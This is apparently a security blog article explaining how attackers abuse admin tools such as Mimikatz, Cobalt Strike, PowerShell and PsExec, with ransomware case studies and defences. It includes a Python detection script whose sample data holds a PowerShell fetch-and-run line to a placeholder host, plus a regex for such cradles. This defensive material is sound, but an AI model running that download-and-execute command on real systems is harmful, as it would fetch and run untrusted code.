Introduction: When Good Tools Go Bad — How Cybercriminals Exploit Admin Software

In the hands of IT professionals, administrative tools are essential. They help manage systems, automate tasks, troubleshoot issues, and secure networks. But in the wrong hands, these same tools can become powerful weapons. Cybercriminals are increasingly repurposing legitimate software to infiltrate networks, steal data, and deploy malware—without setting off alarms.

This tactic, often called “living off the land,” allows attackers to blend in with normal network activity. They use trusted tools already installed in many environments or easily available online. Tools like Mimikatz, Cobalt Strike, and PowerShell were never designed for malicious activity, yet they’ve become staples in modern cyberattacks.

High-profile threats like Maze, NotPetya, REvil, and Ryuk have all demonstrated how effective these tools can be when used for harm. Criminal groups and nation-state actors alike are leveraging them to breach defenses, move laterally within networks, and escalate privileges, often evading traditional security measures.

This article explores how attackers misuse legitimate administrative tools, examines real-world examples of their impact, and outlines what organizations can do to defend against these evolving threats.

Understanding Administrative Tools and Their Legitimate Uses

Administrative tools are essential for IT professionals managing complex systems and networks. They help streamline tasks like configuring devices, automating workflows, troubleshooting issues, and ensuring network security. These tools are typically designed to make life easier for administrators, enabling them to maintain systems efficiently and securely.

For example, PowerShell is a built-in Windows command-line tool that allows administrators to automate tasks across large numbers of devices. It can configure user accounts, manage software updates, and pull system information from remote machines. Tools like PsExec, part of Microsoft’s Sysinternals suite, allow administrators to execute commands on remote systems without needing to be physically present. This is invaluable for managing large enterprise networks.

Other tools, like Mimikatz, were developed for security research and penetration testing. Mimikatz helps security professionals uncover weaknesses in credential storage by demonstrating how easy it can be to extract passwords from memory. Similarly, Cobalt Strike was designed as a penetration testing platform that emulates adversary behavior. Security teams use it to simulate attacks in controlled environments, testing an organization’s defenses.

Remote Desktop Protocol (RDP) is another legitimate tool. It provides administrators and users with remote access to computers over a network. RDP allows IT teams to troubleshoot and manage systems without being onsite, reducing downtime and improving efficiency.

BloodHound is often used by security teams to analyze and visualize Active Directory environments. It helps identify potential privilege escalation paths and misconfigurations that could allow attackers to move through a network.

In legitimate use cases, these tools are powerful allies. They help organizations manage vast infrastructures and test the strength of their security. However, because of their capabilities, they are also attractive to cybercriminals. When attackers gain access to these tools—or their illicit versions—they can leverage them to conduct stealthy, damaging operations that are hard to detect. The same features that make them useful to administrators can make them dangerous in the wrong hands.

How Cybercriminals Misuse These Tools

Cybercriminals are opportunists. Instead of relying solely on custom-built malware that risks detection, they often turn to legitimate administrative tools. This strategy, known as “living off the land,” lets attackers blend in with normal network activity. By using software that IT departments already trust and rely on, they can operate under the radar for longer periods, increasing the damage they inflict.

These tools offer cybercriminals several advantages. First, they’re widely available. Many are open-source or built into operating systems—PowerShell, PsExec, and RDP come preinstalled on millions of machines. Second, they’re familiar to security teams, making it harder to distinguish legitimate use from malicious activity. And third, they don’t always trigger antivirus or endpoint detection systems because they aren’t inherently malicious.

Here’s how attackers typically misuse these tools:

1. Credential Theft and Privilege Escalation
Attackers often start by stealing user credentials. Tools like Mimikatz allow them to extract passwords, hashes, and tickets directly from system memory. Once they have administrative credentials, they can escalate privileges and gain wider access across a network.

2. Lateral Movement Across Networks
After gaining a foothold, cybercriminals use tools like PsExec, PowerShell, and RDP to move laterally between systems. They execute commands remotely, deploy malware, and compromise additional endpoints—all without introducing external files that might raise suspicion.

3. Reconnaissance and Mapping
Understanding the network is critical for attackers. Tools like BloodHound help them map out Active Directory relationships, identify privileged accounts, and find pathways to high-value assets. This step is key for planning a broader attack, including ransomware deployment.

4. Malware Delivery and Command Execution
Cobalt Strike is a favorite for post-exploitation. Although designed for penetration testers, attackers use pirated versions to deploy beacons, execute commands, and control compromised systems. Its ability to evade detection and mimic legitimate traffic makes it particularly dangerous.

5. Data Exfiltration and Encryption
Once attackers have access, they often exfiltrate sensitive data or deploy ransomware. They may use PowerShell scripts or RDP sessions to move stolen files off the network. In ransomware cases, they use these tools to deliver and execute encryption payloads across an organization quickly.

Why “Living Off the Land” Is Effective

By abusing trusted tools, attackers minimize the need for custom malware that could trigger security alerts. Security teams face the challenge of distinguishing routine administrative activity from malicious actions. Monitoring every instance of PowerShell or RDP use can overwhelm even well-equipped teams. Plus, disabling these tools isn’t an option for most organizations, as they are essential for daily operations.

The result? A higher chance of success for attackers, and a much harder job for defenders.

In the next section, we’ll break down the most commonly abused tools, showing how they work and how attackers leverage them in real-world attacks.

Key Tools Exploited by Cybercriminals

Cybercriminals often rely on legitimate tools to execute their attacks. These tools offer powerful capabilities that, when abused, allow attackers to move silently through networks, steal credentials, and deliver malware without raising immediate suspicion. Below are some of the most commonly exploited administrative tools and how they are misused in real-world cyberattacks.

Mimikatz

Legitimate Use:
Mimikatz was originally developed as a proof-of-concept tool for demonstrating weaknesses in Windows authentication. Security professionals use it during penetration tests to show how easily credentials can be extracted from system memory.

How Attackers Abuse It:
Mimikatz allows attackers to dump plaintext passwords, hashes, PINs, and Kerberos tickets directly from system memory. With this information, they can impersonate legitimate users, escalate privileges, and move laterally through a network. The tool is often used in conjunction with pass-the-hash or pass-the-ticket techniques, letting attackers bypass password requirements entirely.

Example:
In the NotPetya attack, Mimikatz was instrumental. Once NotPetya infected a machine, it used Mimikatz to harvest administrator credentials. These credentials were then used to spread the malware across corporate networks, causing widespread damage.

Cobalt Strike

Legitimate Use:
Cobalt Strike is a commercial penetration testing tool designed to simulate advanced persistent threats (APTs). Security teams use it to emulate real-world attack scenarios, testing an organization’s defenses and response capabilities.

How Attackers Abuse It:
Cybercriminals and nation-state actors frequently use cracked or pirated versions of Cobalt Strike. Its “beacon” feature enables remote control of compromised systems. Attackers use it to execute commands, escalate privileges, and move laterally within a network. Its ability to encrypt traffic and mimic legitimate communication makes detection difficult.

Example:
REvil (Sodinokibi) ransomware operators have used Cobalt Strike extensively in their campaigns. After gaining initial access—often through phishing or supply chain attacks—they deploy Cobalt Strike beacons to establish persistence, conduct reconnaissance, and spread ransomware across victim environments.

PowerShell

Legitimate Use:
PowerShell is a powerful scripting language built into Windows, commonly used for system administration, task automation, and configuration management. IT teams rely on it to manage large numbers of machines efficiently.

How Attackers Abuse It:
PowerShell’s power and flexibility make it a favorite among attackers. They use it for fileless malware attacks, where no executable files are dropped on disk—helping avoid detection by antivirus software. PowerShell can download malicious payloads, escalate privileges, and exfiltrate data without raising alarms.

Example:
The Emotet trojan leveraged PowerShell to deliver additional malware payloads, including TrickBot and Ryuk ransomware. By using PowerShell scripts, attackers were able to avoid traditional detection methods and maintain a foothold within targeted networks.

PsExec

Legitimate Use:
PsExec is a Microsoft Sysinternals tool that lets administrators run commands on remote systems. It’s widely used for remote software deployment and troubleshooting.

How Attackers Abuse It:
Attackers use PsExec for lateral movement, executing commands remotely without triggering antivirus alerts. It’s often deployed to launch ransomware or other malware on multiple systems simultaneously after the attacker has obtained administrative credentials.

Example:
The Ryuk ransomware group used PsExec to deploy their ransomware payloads across infected networks. After gaining initial access and harvesting credentials, they used PsExec to manually push the Ryuk executable to critical systems, maximizing the attack’s impact.

Remote Desktop Protocol (RDP)

Legitimate Use:
RDP allows users and administrators to connect to a computer remotely over a network. It’s a critical tool for remote IT support and system management.

How Attackers Abuse It:
Attackers frequently scan for exposed RDP ports on the internet. Once they find an accessible system, they attempt to brute-force login credentials or exploit unpatched vulnerabilities. After gaining access, they can move laterally, exfiltrate data, and deploy ransomware.

Example:
The Dharma ransomware family often gains initial access to victim environments through poorly secured RDP connections. Attackers use stolen or weak credentials to log in and manually deploy ransomware to encrypt files.

BloodHound

Legitimate Use:
BloodHound is an Active Directory (AD) analysis tool used by security professionals to map relationships and permissions within an AD environment. It helps identify potential privilege escalation paths and security weaknesses.

How Attackers Abuse It:
Cybercriminals use BloodHound to gather intelligence on an organization’s AD structure. They identify accounts with high privileges, potential attack paths, and misconfigurations that can be exploited for domain escalation. This information is used to take over entire networks.

Example:
Affiliates of the Maze ransomware operation have been known to use BloodHound during the reconnaissance phase. By mapping out AD privileges and relationships, they streamlined their lateral movement and quickly gained control over targeted domains before deploying ransomware.


These tools aren’t inherently malicious. They play vital roles in network management, security assessments, and IT support. However, their capabilities make them attractive to cybercriminals. By co-opting these tools, attackers avoid detection, increase their chances of success, and inflict greater damage on targeted organizations.

Understanding how these tools are misused is key to building effective defenses. In the next section, we’ll examine specific case studies of malware campaigns that leveraged these tools to devastating effect.


Case Studies: Malware Leveraging Admin Tools

Real-world cyberattacks often reveal just how effective administrative tools can be in the hands of attackers. The following case studies highlight major malware campaigns where legitimate tools were repurposed to facilitate devastating breaches, data theft, and ransomware deployment. These examples demonstrate the tactics, techniques, and procedures (TTPs) used by cybercriminals to exploit trusted software and administrative utilities.

Maze Ransomware

Overview:
Maze ransomware emerged in 2019 and became notorious for combining encryption with data theft—an approach now known as double extortion. Victims not only faced encrypted files but also threats to leak sensitive data if they refused to pay the ransom.

How Admin Tools Were Used:
Maze operators often gained initial access through phishing emails or by exploiting vulnerabilities in remote desktop services. Once inside, they used a range of administrative tools to escalate their access and spread laterally.

Impact:
Maze successfully infiltrated multiple large organizations, including law firms, healthcare providers, and manufacturing companies. The group published stolen data on its leak site to pressure victims into paying ransoms, often demanding millions of dollars.

NotPetya

Overview:
NotPetya was initially disguised as ransomware when it appeared in 2017. In reality, it was a destructive wiper designed to cause widespread disruption, primarily targeting Ukrainian organizations before spreading globally.

How Admin Tools Were Used:
After infecting its first targets via a compromised software update from accounting software provider MeDoc, NotPetya spread rapidly by exploiting administrative tools and stolen credentials.

Impact:
NotPetya caused an estimated $10 billion in global damages. Major multinational companies, including Maersk and Merck, suffered catastrophic outages and data loss, disrupting operations for weeks.

REvil (Sodinokibi)

Overview:
REvil, also known as Sodinokibi, was one of the most prolific ransomware-as-a-service (RaaS) operations. Its operators targeted enterprises, managed service providers (MSPs), and supply chains, often demanding multimillion-dollar ransoms.

How Admin Tools Were Used:
REvil affiliates typically used phishing emails, exploit kits, or vulnerabilities in public-facing applications to gain initial access. Once inside, they used administrative tools for post-exploitation activities.

Impact:
One of REvil’s most high-profile attacks was the Kaseya VSA supply chain breach in 2021. The attack affected up to 1,500 businesses worldwide, leading to ransom demands reportedly reaching $70 million for universal decryption.

Ryuk Ransomware

Overview:
Ryuk ransomware targeted large enterprises and public sector organizations, often through highly targeted attacks. It became infamous for crippling hospitals, city governments, and private corporations, with ransom demands frequently exceeding seven figures.

How Admin Tools Were Used:
Ryuk campaigns typically began with an Emotet or TrickBot infection, which facilitated initial access and reconnaissance.

Impact:
Ryuk was responsible for significant operational disruptions in healthcare facilities, law enforcement agencies, and major corporations. One attack on Universal Health Services (UHS) in 2020 led to weeks of downtime and the diversion of emergency patients, highlighting the real-world consequences of ransomware.


These case studies show a recurring pattern: cybercriminals rely on legitimate tools to execute their attacks efficiently and covertly. Administrative tools like Mimikatz, Cobalt Strike, PowerShell, PsExec, and BloodHound are repurposed to steal credentials, map networks, and deploy malware, all while avoiding detection.

Understanding how these tools are used in high-profile attacks helps organizations anticipate and defend against similar tactics. In the next section, we’ll explore practical defensive strategies to mitigate the risks posed by the misuse of administrative tools.


Defensive Measures Against Misuse

Protecting against the misuse of administrative tools requires a layered approach. Since many of these tools are essential for legitimate IT operations, outright banning them isn’t feasible. Instead, organizations need to implement targeted security strategies that focus on minimizing risk, improving visibility, and responding quickly to suspicious activity. Here are key defensive measures to consider:

1. Enforce the Principle of Least Privilege

Limit user access rights to the bare minimum needed to perform their jobs. Administrative privileges should be tightly controlled and only granted when absolutely necessary. This reduces the potential for attackers to escalate privileges if they compromise a low-level user account.

2. Monitor and Restrict the Use of Administrative Tools

Establish strict policies for when and how tools like PowerShell, PsExec, and RDP can be used.

3. Implement Multi-Factor Authentication (MFA)

Enforce MFA across all user accounts, especially those with administrative privileges or remote access. Even if attackers steal passwords using Mimikatz or similar tools, MFA provides an additional barrier to account compromise.

4. Network Segmentation and Access Controls

Segment internal networks to contain breaches. Critical systems should be isolated from less secure parts of the network.

5. Continuous Monitoring and Threat Detection

Deploy endpoint detection and response (EDR) tools capable of identifying and alerting on suspicious activity associated with administrative tools.

6. Application Whitelisting and Execution Control

Restrict which applications and scripts can run on your systems.

7. Credential Hygiene and Protection

Reduce the risk of credential theft by improving credential management practices.

8. Regular Security Audits and Penetration Testing

Proactively identify and fix vulnerabilities before attackers exploit them.

9. User Awareness and Training

Educate employees on the risks of phishing and credential theft.
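The monitoring and detection measures above can be expressed as concrete rules. The following Python pass, added here as an illustration and not code from the original article, runs over constructed event records shaped loosely like SIEM/EDR exports and flags the PsExec, RDP, PowerShell and credential-dumping patterns the article describes; the field names, the jump-host allowlist, the lsass reader allowlist and the failure threshold are assumptions chosen for the example.

```python
"""Detection rules for the admin-tool abuse patterns discussed in the article.

Rules (field names and thresholds are hypothetical, not from the article):
  - PsExec: event 7045 (service installed) with service name PSEXESVC
  - RDP:    event 4624 LogonType 10 from a source not in the jump-host list,
            and repeated 4625 LogonType 10 failures from one source (brute force)
  - PowerShell: event 4104 script blocks using encoded commands or download cradles
  - Mimikatz-style dumping: Sysmon event 10 where a non-allowlisted process opens lsass.exe
"""
import re
from collections import Counter

APPROVED_RDP_SOURCES = {"10.0.0.5"}  # hypothetical admin jump host
ALLOWED_LSASS_READERS = {r"C:\Windows\System32\csrss.exe", r"C:\Windows\System32\wininit.exe"}
FAILED_LOGON_THRESHOLD = 5
PS_SUSPICIOUS = re.compile(r"-enc(odedcommand)?\b|DownloadString|Invoke-Expression|\bIEX\b", re.I)


def detect(events):
    """Return a list of (rule, host, detail) findings for the given event dicts."""
    findings = []
    failures = Counter()  # (host, source ip) -> count of failed RDP logons
    for e in events:
        eid, host = e["EventID"], e["Computer"]
        if eid == 7045 and e.get("ServiceName", "").upper() == "PSEXESVC":
            findings.append(("psexec_service_install", host, e.get("ImagePath", "")))
        elif eid == 4624 and e.get("LogonType") == 10:
            src = e.get("IpAddress", "")
            if src not in APPROVED_RDP_SOURCES:
                findings.append(("rdp_logon_unapproved_source", host, f"{e.get('TargetUserName')} from {src}"))
        elif eid == 4625 and e.get("LogonType") == 10:
            failures[(host, e.get("IpAddress", ""))] += 1
        elif eid == 4104 and PS_SUSPICIOUS.search(e.get("ScriptBlockText", "")):
            findings.append(("powershell_suspicious_scriptblock", host, e["ScriptBlockText"][:60]))
        elif eid == 10 and e.get("TargetImage", "").lower().endswith(r"\lsass.exe"):
            if e.get("SourceImage") not in ALLOWED_LSASS_READERS:
                findings.append(("lsass_access", host, e.get("SourceImage", "")))
    # Brute-force check is evaluated once all events are counted.
    for (host, src), n in failures.items():
        if n >= FAILED_LOGON_THRESHOLD:
            findings.append(("rdp_bruteforce", host, f"{n} failed RDP logons from {src}"))
    return findings


# Constructed sample telemetry; hosts, users and addresses are made up for the example.
SAMPLE_EVENTS = [
    {"EventID": 7045, "Computer": "FS01", "ServiceName": "PSEXESVC", "ImagePath": r"%SystemRoot%\PSEXESVC.exe"},
    {"EventID": 4624, "Computer": "FS01", "LogonType": 10, "TargetUserName": "svc_backup", "IpAddress": "10.0.0.5"},
    {"EventID": 4624, "Computer": "DC01", "LogonType": 10, "TargetUserName": "jdoe", "IpAddress": "198.51.100.23"},
    *[{"EventID": 4625, "Computer": "RDP01", "LogonType": 10, "IpAddress": "203.0.113.9"} for _ in range(6)],
    {"EventID": 4104, "Computer": "WS07", "ScriptBlockText": "IEX (New-Object Net.WebClient).DownloadString('http://example.invalid/a.ps1')"},
    {"EventID": 4104, "Computer": "WS07", "ScriptBlockText": "Get-Service | Where-Object Status -eq 'Running'"},
    {"EventID": 10, "Computer": "WS07", "SourceImage": r"C:\Users\jdoe\AppData\Local\Temp\mk.exe", "TargetImage": r"C:\Windows\System32\lsass.exe"},
    {"EventID": 10, "Computer": "WS07", "SourceImage": r"C:\Windows\System32\csrss.exe", "TargetImage": r"C:\Windows\System32\lsass.exe"},
]

if __name__ == "__main__":
    for rule, host, detail in detect(SAMPLE_EVENTS):
        print(f"{rule:34s} {host:6s} {detail}")
```

The jump-host logon and the benign Get-Service script block pass silently, which is the point of allowlisting known administrative activity instead of alerting on every PowerShell or RDP use.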


Administrative tools are vital for managing and securing IT environments, but when misused by attackers, they can become serious threats. By enforcing strict access controls, enhancing monitoring, and maintaining strong credential hygiene, organizations can mitigate the risks associated with these tools. Defense isn’t about eliminating their use—it’s about ensuring they’re only used in legitimate, controlled, and transparent ways.

In the next section, we’ll wrap up with key takeaways and actions organizations should prioritize to stay protected.


Conclusion: Turning the Tables on Cybercriminals

Administrative tools like Mimikatz, Cobalt Strike, PowerShell, and PsExec are double-edged swords. In the right hands, they support IT management, security testing, and system maintenance. In the wrong hands, they become powerful weapons for cybercriminals—facilitating data breaches, ransomware attacks, and large-scale disruptions.

As shown by major incidents like Maze, NotPetya, REvil, and Ryuk, attackers often prefer to "live off the land," using these legitimate tools to operate stealthily inside victim networks. Their effectiveness lies in their ability to blend in, making detection and response more difficult for defenders.

The good news is that organizations can take steps to reduce the risk. By enforcing least privilege, monitoring tool usage, strengthening credential security, and segmenting networks, defenders can disrupt the tactics attackers rely on. Combining these strategies with regular security audits and user education builds a defense that makes it harder for cybercriminals to succeed.

The key is vigilance. Administrative tools will always be part of IT operations—but how they’re managed and monitored makes all the difference. Tighten controls, keep watch, and you’ll turn these tools back into what they were meant to be: assets, not liabilities.
